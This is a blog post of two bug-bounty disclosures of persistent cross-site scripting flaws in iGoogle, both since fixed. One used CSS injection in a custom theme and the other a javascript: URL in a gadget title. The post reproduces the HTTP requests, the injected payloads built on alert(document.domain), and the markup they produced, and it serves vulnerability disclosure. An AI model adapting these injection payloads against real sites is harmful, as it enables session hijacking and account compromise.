Hacking Google – Part 2
Posted by Kos on 12/16/2010 at 8:52 am | Last modified: 11/08/2011 6:05 pmVulnerability: Cross Site Scripting
Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1
{"title":"test","author":"test","description":"","skin":
[{"background_image":"');}body{background-image:expression(alert(document.domain));
-o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
"background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
"gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
"tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}
How it’s reflected on the page:
When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.
GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1
....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....
The Danger
A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.
Resolution
This issue was resolved in about a week.
Tags: bounty, google, xss | Categories: Hacking, XSS | Comments (0) | PermalinkHacking Google – Part 1
Posted by Kos on at 8:51 am | Last modified: 11/08/2011 6:05 pmVulnerability: Cross Site Scripting
Affects: all browsers.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.
<ModulePrefs author="Kyle" author_email=""
description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
screenshot="http://www.google.com/images/firefox/sprite2.png"
title_url="javascript:alert(document.domain);" title="[TITLE OF GADGET]" height="165">
<Require feature="setprefs" />
<Require feature="views" />
<Require feature="dynamic-height" />
....
</ModulePrefs>
How it’s reflected on the page:
.... <a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a> .... (The "Hax" string below is the title of the gadget, which was what the reflected link above is)
Resolution
This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/